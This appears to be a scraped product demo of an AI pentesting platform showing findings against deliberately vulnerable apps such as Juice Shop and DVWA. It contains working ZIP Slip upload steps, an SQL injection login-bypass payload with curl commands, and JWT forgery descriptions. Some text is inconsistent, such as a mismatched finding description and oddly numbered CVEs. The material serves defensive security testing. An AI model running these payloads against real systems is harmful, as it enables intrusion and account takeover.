The Continuous Agentic Pentesting Platform

Built for security engineers who want signal, not noise.

Built by the team behind . 42k+
AppSec
Welcome to Keygraph
Start by connecting your Google Workspace
Connect your Google Workspace
Sync your organization's users and groups

Dashboard

Security posture overview

Export CSV
7d 30d 90d
All Severities
Critical
0
High
0
Medium
0
Low
0
SLA Breaches
0
Avg MTTR
0.0d
Risk Over Time
Critical High Medium Low
New vs Resolved
New Resolved
SLA Compliance
Compliant Breached

Findings

Canonical security findings across your organization

Export CSV
Search...
Filter
View
IDTitleRepositorySeverityCVSSEPSSSourceStatusR
KG-0E4E07
ZIP Slip Path Traversal — Arbitrary File Write to Server File...
test/juice-shopHighBlackbox PentestOpen
KG-090F8A
Sensitive Data in JWT Payload — MD5 Password Hash Exp...
test/juice-shopHighBlackbox PentestOpen
KG-114331
IDOR Write Access — Modify or Delete Any User’s Basket I...
test/juice-shopHighBlackbox PentestOpen
KG-074374
XML External Entity (XXE) Injection — Arbitrary File Read vi...
test/juice-shopHighBlackbox PentestOpen
KG-855CAA
Sensitive Data Exposure — Password Hashes and DeluxeTo...
test/juice-shopCriticalBlackbox PentestOpen
KG-EC0DBE
Sensitive Information Disclosure — Admin Configuration E...
test/juice-shopMediumBlackbox PentestOpen
KG-94ADCF
ZIP Path Traversal — Arbitrary File Write to Publicly Served...
test/juice-shopHighBlackbox PentestOpen
KG-E2C6A5
IDOR Write/Delete — Unauthorized Modification and Deleti...
test/juice-shopHighBlackbox PentestOpen
KG-49777C
IDOR — Unauthorized Read Access to Any User’s Shoppin...
test/juice-shopHighBlackbox PentestOpen
KG-417855
Broken Access Control — Admin User Data Exposed to Cus...
test/juice-shopHighBlackbox PentestOpen
KG-9B50D6
Unauthenticated FTP Directory Exposure — Sensitive Files,...
test/juice-shopCriticalBlackbox PentestOpen
KG-7823AD
Account Takeover via Publicly Exposed Security Question ...
test/juice-shopCriticalBlackbox PentestOpen
KG-0F233C
Horizontal Authorization Bypass — Email Vowel-Obfuscati...
test/juice-shopMediumWhitebox PentestOpen
KG-9301D0
Horizontal Authorization Bypass — Email Vowel-Obfuscati...
test/juice-shopMediumWhitebox PentestOpen

Finding Details

HIGH Open
Resolve False Positive Assign
ZIP Slip Path Traversal — Arbitrary File Write to Server Filesystem via /file-upload
Overview Remediation Verification Activity
Description

The CI pipeline fetches an installer script from a self-hosted Heroku CDN endpoint and immediately pipes it to sh for execution without any integrity verification.

Evidence
TARGET
POST /file-upload (accessed via /#/complain complaint form)
TYPE
UNSPECIFIED
Reproduction Steps 4 steps
1
Authenticate and obtain JWT: Log in as any customer account to get a Bearer token. TOKEN=$(python3 -c " import urllib.request, json data = json.dumps({'email': 'recon-fresh@blackbox-dast.local', 'password': 'Recon@Test2024!'})...")
2
Create a malicious ZIP with path traversal entry: Craft a ZIP archive whose entry filename contains '../..' to escape the upload directory. python3 -c " import zipfile, io buf = io.BytesIO() with zipfile.ZipFile(buf, 'w') as zf: zf.writestr('../../ftp/zipslip_confirmed.md', '# ZIP Slip Confirmed\nThis file was written via ZIP Slip path traversal.\nPayload: ../../ftp/zipslip_confirmed.md\n...')
3
Upload the malicious ZIP to trigger the path traversal: Upload the crafted archive via the complaint file-upload endpoint. curl -s -w "HTTP: %{http_code}\n" \ -X POST 'https://338c-2601-645-8100-7600-5891-afad-f118-9dcc.ngrok-free.app/file-upload' \ -H "Authorization: Bearer $TOKEN" \ -F "file=@/tmp/evil_zipslip.zip;type=application/zip" # Expected: HTTP 204
4
Verify the traversed file is accessible outside the upload directory: Confirm that the file was written to /ftp/ by accessing it directly. curl -s 'https://338c-2601-645-8100-7600-5891-afad-f118-9dcc.ngrok-free.app/ftp/zipslip_confirmed.md' # Expected: HTTP 200 with attacker-controlled content
Proof of Concept Hide

BB-15: ZIP Slip Path Traversal — Arbitrary File Write to Server Filesystem via /file-upload (High)

OWASP: A01:2025 — Broken Access Control Endpoint: POST /file-upload (accessed via /#/complain complaint form) Auth State: Authenticated customer (recon-fresh@blackbox-dast.local)

The file upload endpoint processes ZIP archives without sanitizing entry paths for directory traversal sequences. An authenticated customer can create a ZIP file containing an entry with a filename such as ../../ftp/attacker.md, which the server extracts to a path outside the intended upload directory. Files written to /ftp/ are immediately publicly accessible via the web. Existing files, including application files, can be overwritten. The upload directory is exactly two levels below /ftp/, making traversal trivial. Escalation to Remote Code Execution is plausible if the traversal depth is sufficient to overwrite Node.js module files or application routes.

What does Remediate do?

Generates an AI-authored fix and opens it as a pull request on the target repo. You review the diff and merge it; this finding auto-resolves once the PR lands.

  • The patch lands on test/juice-shop, targeting the branch shown below. You can override that branch per repo.
  • Generation usually takes 1–3 minutes; you’ll see status update here without refreshing.
  • Closing the PR without merging won’t reopen the finding — only successful merges close it.
Auto-patch unavailable

Auto-patch isn’t available for GitLab repositories yet.

Remediate
Activity Log
System Opened finding · Apr 27, 2026 08:11 AM

AI Pentester

Autonomous penetration testing across your organization

10Passed 2Running 11Failed 0Queued 13Canceled
Search...
Filter
View
TargetStatusExploitsRepositoriesCreatedActions
https://keygraph-mdm-test.tunn.dev
Black BoxStagingExploit
RunningTestingjuice-shop33 minutes ago
https://keygraph-mdm-test.tunn.dev
White BoxStagingExploit
Running0 exploitsjuice-shopabout 2 hours ago
https://keygraph-mdm-test.tunn.dev
Black BoxStagingExploit
Failedabout 1 hour ago
https://338c-2601-645-8100-7600...
Black BoxStagingExploit
CompletedView Reportjuice-shop6 days ago
https://keygraph-mdm-test.tunn.dev
Black BoxStagingExploit
CompletedView Report6 days ago
https://qf1esqaymz62oydu1k2vxtya...
White BoxStagingExploit
Canceled0 exploitsjuice-shop6 days ago

AI Pentester

View detailed results from the autonomous penetration test

Pentest Complete
Found 15 potential vulnerabilities
CRITICAL
0
HIGH
0
MEDIUM
0
LOW
0
15 total findings 2h 49m duration
Vulnerabilities 15 Execution
Injection Vulnerabilities 4
CriticalConfirmedINJ-VULN-01
SQL Injection Authentication Bypass at POST /rest/user/login
POST/rest/user/login · 4 days ago
CriticalConfirmedINJ-VULN-02
SQL Injection UNION-Based Data Extraction at GET /rest/products/search
GET/rest/products/search · 4 days ago
HighConfirmedINJ-VULN-05
NoSQL Operator Injection Mass-Update at PATCH /rest/products/reviews
PATCH/rest/products/reviews · 4 days ago
Cross-Site Scripting (XSS) 6
Authentication Issues 19
CriticalConfirmedAUTH-VULN-07
JWT Algorithm None (alg:none) Authentication Bypass
ALLisAuthorized()-protected endpoints · 4 days ago
Server-Side Request Forgery (SSRF) 2
Authorization Issues 27
AppSec Enrichment
SAST results were used to enrich this pentest
Enriched Repositories
juice-shop
Repositories
local-dev-kg/juice-shop master
Configuration
Authentication Form Login
Login URLhttps://93ea-2a09-bac5-3b2d-eaa-...
Credentials Reveal
Usernamegeorge@keygraph.com Password••••••••
Login Flow
  1. Type $username into the email or username field
  2. Type $password into the password field
  3. Click the login or sign in button
Success Condition URL Contains /
Testing Rules
Focus 2 rules
Path/apiFocus on REST API endpoints
Path/restFocus on user-facing routes
Avoid 1 rule
Path/#/score-boardSkip the score board meta-challenge page
Custom HTTP Headers 1 header
x-agent shannon-pentestes
Total Duration
2h 49m 0s
Agents Run
52
Agent Breakdown
Reconnaissance
16m 1s
reporter
7m 58s
strategy
58s
Injection Analysis
12m 2s
XSS Analysis
16m 6s
Auth Analysis
13m 57s
SSRF Analysis
5m 28s
AuthZ Analysis
8m 56s
Reporting
28m 51s
Total
2h 49m 0s
Security Assessment Report
Target: https://93ea-2a09-bac5-3b2d-eaa-00-176-3f.ngrok-free.app
Generated 4 days ago · Pentest run 93ea-2a09-bac5-3b2d-eaa-00-176-3f.ngrok-free.app
Executive Summary

This security assessment of 93ea-2a09-bac5-3b2d-eaa-00-176-3f.ngrok-free.app was conducted on April 23, 2026, targeting the application's REST API surface (/rest/*) with a focus on authentication, authorization, and data handling. The assessment uncovered 66 confirmed vulnerabilities20 critical, 25 high, 20 medium, and 1 low — reflecting systemic compromised auth posture, unauthenticated attacker control over user identifiers via SQLi, broken JWT signature verification, and high-impact authorization bypasses across multiple commerce flows. Exploits worked end-to-end in a controlled environment (autonomous orchestrator + LLM-powered analysis) and a complete remediation roadmap is included alongside reproductible PoCs.

Vulnerability Summary
IDVulnerabilityEndpointSeverity
INJ-VULN-01SQL Injection Authentication BypassPOST /rest/user/loginCRITICAL
INJ-VULN-02SQL Injection UNION-Based Data ExtractionGET /rest/products/searchCRITICAL
AUTH-VULN-07JWT Algorithm None (alg:none) Authentication BypassALL isAuthorized()-protected endpointsCRITICAL
AUTH-VULN-10Default Admin CredentialsPOST /rest/user/loginCRITICAL
AUTH-VULN-14Mass Assignment Privilege Escalation (Admin Role Registration)POST /api/UsersCRITICAL
AUTH-VULN-18SQL Injection Authentication BypassPOST /rest/user/loginCRITICAL
XSS-VULN-04Reflected XSS via Track-Order ParameterGET /#/track-resultHIGH
XSS-VULN-06JSONP Callback Injection · Cross-Domain Data TheftGET /rest/user/whoamiHIGH
Reproduction (sample)
{
  "id": "INJ-VULN-01",
  "endpoint": "POST /rest/user/login",
  "payload": "' OR '1'='1'--",
  "response_code": 200,
  "response_signature": "george@keygraph.com (id=1, role=admin)",
  "reproduced": true
}

Exploit Details

Detailed vulnerability analysis and reproduction information

Critical Confirmed INJ-VULN-01
SQL Injection Authentication Bypass at POST /rest/user/login
Discovered 4 days ago
Affected Target
TypeINJECTION LocationPOST /rest/user/login
Reproduction Steps 4 steps
1

Send POST /rest/user/login with tautology payload in email field

2

The injected SQL becomes: SELECT * FROM Users WHERE email = '' OR '1'='1'--' AND password = '...'

3

The -- comments out the password check; SQLite returns the first row (admin, id=1)

4

Observe HTTP 200 response containing admin JWT token

Proof of Impact

HTTP 200 returned with admin JWT token (email: george@keygraph.com, role: admin, id: 1). MD5 hash 0192023a7bbd73250516f069df18b500 = admin123 confirmed via rainbow table.

Proof of Concept
1## Payload2' OR '1'='1'--34## Reproduction5curl -s -X POST "https://93ea.../rest/user/login" \6 -H "Content-Type: application/json" \7 -d '{"email":"'\'' OR '\''1'\''='\''1'\''--","password":"x"}'89## Proof10HTTP 200 returned with admin JWT (uemail: george@keygraph.com).

AI Pentester

View detailed results from the autonomous penetration test

https://keygraph-mdm-test.tunn.dev
STAGING Exploit WHITE BOX 2h 6m about 2 hours ago juice-shop
Running pentest…
Cancel
Pentest Progress 1h 43m 26s
Code Analysis
Discovery
Security Testing
Report
Finalizing
Vulnerability Pipelines
Code Injection
Vulnerability
Exploit
Analyzing vulnerabilities…
Cross-Site Scripting
Vulnerability
Exploit
Complete
Authentication
Vulnerability
Exploit
Analyzing vulnerabilities…
Server-Side Request Forgery
Vulnerability
Exploit
Complete
Authorization
Vulnerability
Exploit
Analyzing vulnerabilities…
Completed 6 85m 17s

Container Scans

Scan Docker images for vulnerabilities, secrets, and misconfigurations

Scan Image
11Passed 0Running 0Failed 0Queued
Search...
Filter
View
Image & ContextTriggeredProgressFindings
local-dev-kg/vuln-bankmultiarch-amd64only
30 days agoManual
Complete
3 Critical27 High
local-dev-kg/vuln-bankbuilt-on-x86
about 2 months agoManual
Complete
3 Critical18 High
local-dev-kg/dvwaamd64-intel-mac
about 2 months agoManual
Complete
254 Critical552 High
local-dev-kg/vuln-bankmultiarch-amd64only
about 2 months agoManual
Complete
3 Critical18 High
local-dev-kg/testingtest-empty-image
about 2 months agoManual
Complete
0
local-dev-kg/fineractlatest
about 2 months agoManual
Complete
1 High1 Medium
local-dev-kg/vuln-banklatest
about 2 months agoManual
Complete
3 Critical18 High
local-dev-kg/testingtest-clean-minimal
about 2 months agoManual
Complete
0

dvwa

local-dev/dvwa amd64-intel-mac

Completed
5h about 1 month ago Manual
Total
1576
Critical
254
High
552
Medium
642
Low
119
Info
12
AI Analysis AI Generated

This container has CRITICAL risk with 3 critical and 27 high severity vulnerabilities, including CVE-2025-15407 (CVSS 9.6) affecting OpenSSL, with remote code execution potential. 91 of 225 findings are fixable, with 77% originating from the base image, indicating systemic base image vulnerabilities. The Debian 13.7 (Trixie) base image contains multiple critical OpenSSL and glibc vulnerabilities that pose immediate security risks. Switch to gcr.io/distroless/python3-debian13 to eliminate OS package vulnerabilities while maintaining Python runtime support.

  1. Upgrade OpenSSL packages (openssl, libssl1n4, openssl-provider-legacy) to version 3.5.4-1+deb13u3 or later to fix CVE-2025-15407 (CVSS 9.6), CVE-2025-49459 (CVSS 7.4), CVE-2025-49421 (CVSS 7.4), and CVE-2025-29390 (CVSS 7.3).
  2. Upgrade glibc (libc6) to version 2.41-12+deb13u2 to fix CVE-2025-9091 (CVSS 8.2): integer overflow leading to heap corruption.
  3. Upgrade ncurses packages (ncurses-base, ncurses-bin, libncurses6) to version 6.5+20250515-3+deb13u1 to fix CVE-2025-69730 (CVSS 7.9): buffer overflow vulnerability.
  4. Update Python environment with updated dependencies; ipaca connect to 0.13+ and wheel to 0.46.2+ to fix CVE-2024-23048 (CVSS 8.6) and CVE-2024-26349 (CVSS 8.0).
  5. Configure Dockerfile to use a non-root user (USER directive) to address high-severity misconfiguration finding.

Layer Breakdown

Base Image: 91 (77%)Application: 1525 (96%)Config: 3
LayerOriginDockerfile InstructionPkgsCHMLTotal
0base# debian.13-slim 'sloth' 6c17985330093214165147
1baseRUN set -eux; apt-get update; apt-get install -y --no-install-rec...111417
2baseRUN set -eux; saveAptMark="$(apt-mark showmanual)"; apt-get upd...4144018
3applicationRUN apt-get update && apt-get install -y postgresql-client6048028
4applicationRUN apt-get update && apt-get install -y postgresql-client10000010
5applicationRUN pip install --no-cache-dir -r requirements.txt5000020
misconfigDockerfile best-practice violations22
All 225 Vulnerabilities 222 Secrets 0 Misconfigurations 3
Search...
Filter
View
SeverityTypeIDTitlePackageCVSS
CriticalCVE-2013-15903httpd: read-after-free in h2 connection shutdownapache2 2.4.25-3+deb8u39.1
CriticalCVE-2013-15891mod_session: Heap overflow due to a crafted SessionHeader d...apache2 2.4.25-3+deb8u39.1
CriticalCVE-2013-37875mod_proxy: SSRF via a crafted URI in mod_proxy_http...apache2 2.4.25-3+deb8u39.0
CriticalCVE-2013-46499httpd: Out-of-bounds write in ap_escape_quotes() via malicious i...apache2 2.4.25-3+deb8u38.9
CriticalCVE-2022-26377httpd: mod_lua: Possible buffer overflow when parsing multipart c...apache2 2.4.25-3+deb8u38.7
CriticalCVE-2022-22719httpd: Errors encountered in the discarding of request body to t...apache2 2.4.25-3+deb8u38.6
CriticalCVE-2022-31813httpd: mod_proxy: X-Forwarded-* headers stripping breaks IP-bas...apache2 2.4.25-3+deb8u38.5
CriticalCVE-2022-28615httpd: mod_lua: Possible NULL-pointer dereference reads beyon...apache2 2.4.25-3+deb8u38.5
CriticalCVE-2022-30556httpd: mod_lua: Buffer overflow when parsing multipart request c...apache2 2.4.25-3+deb8u38.4
CriticalCVE-2022-29404httpd: mod_lua: DoS in r:parsebodyapache2 2.4.25-3+deb8u38.3
CriticalCVE-2021-44790httpd: mod_lua: Possible buffer overflow when parsing multipart c...apache2 2.4.25-3+deb8u38.2
CriticalCVE-2021-39275httpd: ap_escape_quotes() out-of-bounds writeapache2 2.4.25-3+deb8u38.1
Rows per page 15
1-15 of 222

Logs

Every action recorded with actor, timestamp, and source

Select date range
Event Types
Subjects
TimeEvent TypeSubjectActor
Apr 27, 2026 08:02:38appsec:SubmitBoundarySelectionjuice-shopgeorge@keygraph.com
Apr 27, 2026 07:50:57appsec:TriggerBoundaryAnalysisjuice-shopgeorge@keygraph.com
Apr 27, 2026 07:50:29appsec:TriggerManualScanjuice-shopgeorge@keygraph.com
Apr 27, 2026 07:21:01appsec:TriggerManualScanvuln-bankgeorge@keygraph.com
Apr 27, 2026 06:39:51appsec:TriggerManualScanjuice-shopgeorge@keygraph.com
Apr 27, 2026 05:54:14appsec:TriggerManualScandvwageorge@keygraph.com
Apr 27, 2026 05:53:42appsec:TriggerManualScanjuice-shopgeorge@keygraph.com
0 of 10 row(s) selected.
Rows per page 10 Page 1 of 19
All Messages Tasks Notifications
All Pending Completed Unread Read
No messages yet
You don’t have any messages in your inbox. When you receive messages, they’ll appear here.

Users

Manage users and invitations for your organization

Invite User
Users Invitations
Search...
Filter
View
NameEmailStatusRoleAccount TypeLink StatusActions
George Floresgeorge@keygraph.comActiveMember UserPrimary
Rows per page 20
1-1 of 1
George Flores
george@keygraph.com
Active
User Details Groups Device Management
Personal Information
Full Name
George Flores
Display Name
George Flores
Primary Email
george@keygraph.com
Secondary Email
,
Employment Information
Title
,
Department
,
Role Category
,
Preferences
Preferred Language
No groups yet
Create groups to organize users, scope permissions, and route findings to the right teams.
Connected 5 Available Integrations
Anthropic AI & Security
LLM provider integration for AI-powered security testing with Shannon
Connected
Amazon Web Services (AWS) Cloud Provider
AWS integration for cloud resource security and compliance tracking
Connect
BetterStack Monitoring
Uptime monitoring, incident management, and on-call tracking
Connect
Docker Hub Container Registry
Container image scanning for vulnerabilities and misconfigurations
Connected
Google Cloud Platform (GCP) Cloud Provider
Google Cloud Platform integration for cloud resource security and compliance tracking
Connect
GitHub Source Control
GitHub App integration for source code security and compliance scanning
Connected
GitLab Source Control
GitLab Group Access Token integration for source code security scanning
Connected
Google Workspace Directory
Google Workspace integration for syncing user directory and profile information
Connect
Jira Cloud Ticketing
Sync findings into Jira projects with bi-directional status updates
Connected
Search...
Filter
View
RepositoryDefault BranchGroupLast Scanned
local-dev-kg/juice-shopmasterUnassignedabout 8 hours ago
test/juice-shop-appsecmasterUnassignedabout 8 hours ago
local-dev-kg/AWSGoatmasterUnassignedabout 1 month ago
local-dev-kg/WebGoatmainUnassigned3 days ago
local-dev-kg/DVWAmasterUnassigned9 days ago
local-dev-kg/dvws-nodemasterUnassignedNever scanned
local-dev-kg/NodeGoatmasterUnassigned11 days ago
local-dev-kg/railsgoatmasterUnassigned14 days ago
local-dev-kg/pygoatmainUnassigned13 days ago
local-dev-kg/crAPIdevelopUnassignedabout 1 month ago
local-dev-kg/VAmPImasterUnassignedNever scanned
local-dev-kg/wrongsecretsmasterUnassigned25 days ago
local-dev-kg/dvgamasterUnassignedNever scanned
local-dev-kg/bWAPPmasterUnassignedNever scanned
local-dev-kg/mutillidaemasterUnassignedNever scanned
Rows per page 15
1-15 of 15

All Scans

Scans across all scan types

162 scans 15 failed
SAST 51 SCA 48 IaC 18 Container 11 Black Box 14 White Box 20
Search...
Filter
All 162 Active 0 Failed 15 Completed 147
View
TypeTargetStatusFindingsTriggered
SAST
local-dev-kg/juice-shopmaster · 19a3054c
Complete
4 Critical28 High
12 days agoManualComprehensive
SCA
local-dev-kg/juice-shopmaster · 19a3054c
Complete
18 Critical28 High
12 days agoManualComprehensive
IaC
local-dev-kg/k8s-terraform-ansible-samplemaster · 1a69bf99
Complete
4 Critical10 High
12 days agoManualComprehensive
SAST
local-dev-kg/bc-kotlinmain · 27f05751
Complete4 High
12 days agoManualComprehensive
SCA
local-dev-kg/cxfmain · 5a501cd8
Complete
6 Critical16 High
12 days agoManualFast

SAST Scans

Static Application Security Testing scan runs

44Passed 0Running 3Failed 0Queued 4Canceled
Search...
Filter
View
Repository & ContextStatusFindingsTriggeredLanguage
local-dev-kg/bc-kotlinmain · 27f05751
Complete4 High
12 days agoManualComprehensive
Kotlin
local-dev-kg/bc-csharpmaster · 5200dfdf
Complete
27 High10 Medium
12 days agoManualComprehensive
C#
local-dev-kg/juice-shopmaster · 19a3054c
Complete
4 Critical28 High
12 days agoManualComprehensive
JS
local-dev-kg/pipline-test-repomain · 8524e5fb
Complete
9 Critical10 High
18 days agoManualComprehensive
JS
local-dev-kg/driftmain · f329b1ab
Complete
1 Critical4 High
18 days agoManualComprehensive
Ruby
local-dev-kg/pipline-test-repomain · 8524e5fb
Complete
10 Critical9 High
18 days agoManualComprehensive
JS
local-dev-kg/driftmain · f329b1ab
Complete
1 Critical2 High
18 days agoManualComprehensive
Ruby
local-dev-kg/driftmain · f329b1ab
Complete
1 Critical2 High
18 days agoManualComprehensive
Ruby

SCA Scans

Software Composition Analysis scan runs

42Passed 0Running 1Failed 0Queued 5Canceled
Search...
Filter
View
Repository & ContextStatusFindingsTriggered
local-dev-kg/bc-kotlinmain · 27f05751
Complete1 Medium
12 days agoManualComprehensive
local-dev-kg/bc-csharpmaster · 5200dfdf
Complete3 Medium
12 days agoManualComprehensive
local-dev-kg/cxfmain · 5a501cd8
Complete
6 Critical16 High
12 days agoManualFast
test/vectormaster · 47b5b02b
Complete
5 Critical11 High
12 days agoManualComprehensive
test/grafanamain · a4dbaa56
Complete
1 Critical8 High
12 days agoManualFast
test/vuln-bankmain · 9b22a832
Complete
6 High14 Medium
12 days agoManualComprehensive
local-dev-kg/juice-shopmaster · 19a3054c
Complete
18 Critical28 High
12 days agoManualComprehensive
local-dev-kg/driftmain · f329b1ab
Complete
2 Critical7 High
18 days agoManualComprehensive

IaC Scans

Infrastructure as Code scan runs

17Passed 0Running 0Failed 0Queued 1Canceled
Search...
Filter
View
Repository & ContextStatusFindingsTriggered
local-dev-kg/k8s-terraform-ansible-samplemaster · 1a69bf99
Complete
4 Critical10 High
12 days agoManualComprehensive
local-dev-kg/AWSGoatmaster · b24869ad
Complete
2 Critical6 High
12 days agoManualComprehensive
local-dev-kg/juice-shopmaster · 19a3054c
Complete
3 High5 Medium
12 days agoManualComprehensive
local-dev-kg/AWSGoatmaster · b24869ad
Complete
7 High1 Medium
14 days agoManualComprehensive
local-dev-kg/juice-shopmaster · 19a3054c
Complete
7 High1 Low
19 days agoManualComprehensive
test/juice-shop-appsecmaster · 05e0be7b
Complete
10 High13 Medium
22 days agoManualFast
local-dev-kg/juice-shopmaster · 19a3054c
Complete
7 High1 Medium
22 days agoManualComprehensive
local-dev-kg/juice-shopmaster · 19a3054c
Complete
11 High10 Medium
22 days agoManualFast

Findings

SAST Scan (JavaScript)

local-dev-kg/juice-shop
Completed
master 85e8be7b JavaScript 75K about 10 hours ago Manual Fast
Commit message: Update global-cs.yml file
Total
79
Critical
41
High
22
Medium
16
Low
0
Info
0
Data Flow 42 Point Issues 28 Business Logic 9
Search...
Filter
View
FindingData FlowBoundariesTeamsSeverity
CWE-643: XPath Operator Injection via JSON-parsed URL parameter in Sequelize WHERE clause
recycles.ts:34 (col 21)juice-shopengineeringHIGH
CWE-89: SQL Injection via unverified email field in login query
login.ts:34 → login.ts:55juice-shopengineeringHIGH
CWE-209: XSS via unverified URL controlled URL in profile-image fetch
profileImageUrlUpload.ts:13 → profileImageUrlUpload.ts:16juice-shopengineeringHIGH
CWE-943: NoSQL Injection via unverified request body ID in MongoDB query
b2bOrder.ts:30 → b2bOrder.ts:35juice-shopengineeringHIGH
CWE-943: NoSQL Injection via unverified request body ID in MongoDB query
b2bOrder.ts:30 → b2bOrder.ts:39juice-shopengineeringHIGH
CWE-943: NoSQL Injection via unverified request body in MongoDB query filter
b2bOrder.ts:30 → b2bOrder.ts:42juice-shopengineeringHIGH
CWE-22: Path Traversal via unverified request body file in fileRead
verifyFiles.ts:9 → verifyFiles.ts:24juice-shopengineeringHIGH
CWE-502: Unsafe deserialization via user-controlled file path in fs.read
payment.component.ts:11 → payment.component.ts:18juice-shopengineeringHIGH
CWE-89: SQL Injection via unverified search parameter in raw Sequelize query
search.ts:13 → search.ts:18juice-shopengineeringHIGH
Rows per page 15
1-9 of 15
FindingLocationBoundariesTeamsSeverity
CWE-347: JWT Token Decoded Without Signature Verification
app.guard.ts:18juice-shopengineeringCRITICAL
CWE-310: SQL Injection in Authentication Query Leading to Cleartext Password Transmission
login/loginUserChallenge_4.ts:15juice-shopengineeringCRITICAL
CWE-548: Directory Listing Exposure - (well-known Directory)
directoryListing/dirIndex_4.ts:0juice-shopengineeringHIGH
CWE-1004: Insufficient Random Password Generation Using Base64 Encoding of Reversed Email
auth/component_2.ts:18juice-shopengineeringHIGH
CWE-328: Use of Weak Hash Function (Base64) for Password Generation
auth/component_3.ts:18juice-shopengineeringHIGH
CWE-614: Authentication Token Cookie Missing Secure Flag
payment.component.ts:11juice-shopengineeringHIGH
CWE-614: Authentication Token Cookie Missing Secure Flag
two-factor-auth-enter.component.ts:14juice-shopengineeringHIGH
CWE-327: Weak HMAC Secret Key - Hardcoded For 2FA Authentication
2fa/totp_5.ts:5juice-shopengineeringHIGH
CWE-326: Hardcoded RSA Private Key in Source Code
cryptUtils.ts:14juice-shopengineeringHIGH
CWE-693: Predictable RSA Private Key for Security Sensitive Data
cryptUtils.ts:18juice-shopengineeringHIGH
CWE-565: Missing CSRF Protection on State-Changing Endpoint Verdict Acknowledgment
checkVerdict.ts:25juice-shopengineeringHIGH
CWE-213: excessive-data-exposure in routes/authenticatedUsers.ts:25
authenticatedUsers.ts:25:0juice-shopengineeringHIGH
CWE-20: missing-input-validation in routes/b2bOrder.ts:19
b2bOrder.ts:19:0juice-shopengineeringHIGH
CWE-770: missing-rate-limit in routes/search.ts:23
search.ts:23:0juice-shopengineeringHIGH
CWE-770: missing-rate-limit in routes/b2bOrder.ts:17
b2bOrder.ts:17:0juice-shopengineeringHIGH
CWE-770: missing-rate-limit in routes/chatbot.ts:205
chatbot.ts:205:0juice-shopengineeringHIGH
CWE-770: missing-rate-limit in routes/dataExports.ts:16
dataExports.ts:16:0juice-shopengineeringHIGH
CWE-770: missing-rate-limit in routes/search.ts:23
search.ts:23:0juice-shopengineeringHIGH
CWE-639: bola in routes/basket.ts:0
basket.ts:0juice-shopengineeringHIGH
CWE-915: mass-assignment in server.ts:0
server.ts:0juice-shopengineeringHIGH
CWE-269: privesc in server.ts:0
server.ts:0juice-shopengineeringHIGH
Rows per page 15
1-10 of 28
FindingData FlowBoundariesTeamsSeverity
CWE-287: Authentication Bypass in changeProduct
server.ts:0 → server.ts:0juice-shopengineeringCRITICAL
CWE-287: Authentication Bypass in changePassword
changePassword.ts:0 → changePassword.ts:0juice-shopengineeringHIGH
CWE-287: Authentication Bypass in updateProductReview
updateProductReviews.ts:0 → updateProductReviews.ts:0juice-shopengineeringHIGH
CWE-285: Authorization Bypass in orderHistory
orderHistory.ts:0 → orderHistory.ts:0juice-shopengineeringHIGH
CWE-287: Authentication Bypass in collectorWebReader
recyclewebreader.ts:0 → recyclewebreader.ts:0juice-shopengineeringHIGH
CWE-287: Authentication Bypass in serviceFlow
services.ts:0 → services.ts:0juice-shopengineeringHIGH
CWE-287: Authentication Bypass in deliveryService
deliveryMethod.ts:0 → deliveryMethod.ts:0juice-shopengineeringHIGH
CWE-639: Insecure Direct Object Reference in trackOrder
trackOrder.ts:0 → trackOrder.ts:0juice-shopengineeringHIGH
CWE-639: Insecure Direct Object Reference in couponCheck
couponcheck.ts:0 → couponcheck.ts:0juice-shopengineeringHIGH
CWE-287: Authentication Bypass in forgotFeedback challenge
feedbackChallenge.ts:0 → feedbackChallenge.ts:0juice-shopengineeringHIGH
CWE-287: Authentication Bypass in N/A (finds auto-generated)
N/A:0 → N/A:0juice-shopengineeringHIGH
Rows per page 15
1-6 of 9

SCA Scan

local-dev-kg/juice-shop
Completed
master 05e0be7b 16m 1 day ago Manual Fast
Commit message: Update .gitlab-ci.yml file
Total
174
Critical
13
High
73
Medium
81
Low
7
Info
0
Search...
Filter
PackageReachabilityDependencyRecommendationBoundariesTeams
marsdb@0.6.11
npm
Reachable (1 of 2)Direct, juice-shopengineering
jsonwebtoken@0.4.0
npm
Reachable (2 of 4)Directcd appsec/scans/appsec-ba…juice-shopengineering
vm2@3.9.17
npm
Reachable (1 of 5)Transitivecd appsec/scans/appsec-ba…, ,
express-jwt@0.1.3
npm
ReachableDirectcd appsec/scans/appsec-ba…juice-shopengineering
sanitize-html@1.4.2
npm
Reachable (2 of 7)Directcd appsec/scans/appsec-ba…juice-shopengineering
jsonwebtoken@0.4.0
CRITICAL SCA 4 CVEs
Recommendation
How to fix this vulnerability

Update jsonwebtoken from version 0.4.0 to version 4.2.2 or later.

Upgrade Command
cd appsec/scans/appsec-baseline-scans/8eed4fb4-4809-40b8-9769-f662decd9741/repo && npm install jsonwebtoken@4.2.2
CVEs in jsonwebtoken@0.4.0 (4)
CVE-2015-9235Criticaljuice-shopengineering
✨ AI ANALYSIS

jsonwebtoken@0.4.0 does not validate the JWT algorithm during jwt.verify(), enabling both the alg:none bypass and an RS256→HS256 algorithm confusion attack. The codebase calls jwt.verify(token, publicKey, callback) without an algorithms allowlist in three production files.

CVE-2022-23541High Riskjuice-shopengineering
✨ AI ANALYSIS

jsonwebtoken@0.4.0 is called via jwt.verify() in three production routes without restricting the allowed algorithm. An attacker can craft a forged JWT signed with HS256 using the RSA public key as the HMAC secret, which the library will accept as valid, completely bypassing authentication.

CVE-2022-23539Low Risk
✨ AI ANALYSIS
jsonwebtoken unrestricted key type could lead to legacy keys usage

Versions ≤8.5.1 of jsonwebtoken library could be misconfigured so that legacy, insecure key types are used for signature verification.

Not exploitable: LLM analysis determined this vulnerability is not exploitable in context
CVE-2022-23540Low Risk
✨ AI ANALYSIS
Signature validation bypass due to insecure default algorithm in jwt.verify()

In versions ≤8.5.1 of jsonwebtoken library, lack of algorithm definition and a falsy secret or key in the jwt.verify() call could lead to signature validation bypass.

Not exploitable: LLM analysis determined this vulnerability is not exploitable in context

SECRETS Scan

local-dev-kg/juice-shop
Completed
master 19a3054c 67m 1 day ago Manual Comprehensive
Commit message: Add GSoC 2025 project
Total
4
Critical
0
High
4
Medium
0
Low
0
Info
0
General Remediation Advice for Exposed Secrets
Search...
Filter
View
DescriptionLocationCWESeverity
Hardcoded OAuth 2.0 Access Token Exposure in URL Parameter
frontend/src/app/Services/user.service.ts:60CWE-798HIGH
Hardcoded Ethereum Mnemonic Phrase in Source Code
routes/checkKeys.ts:7CWE-798HIGH
Hardcoded Alchemy API Key in WebSocket Provider
routes/nftMint.ts:9CWE-798HIGH
Hardcoded Alchemy API Key in Production Code
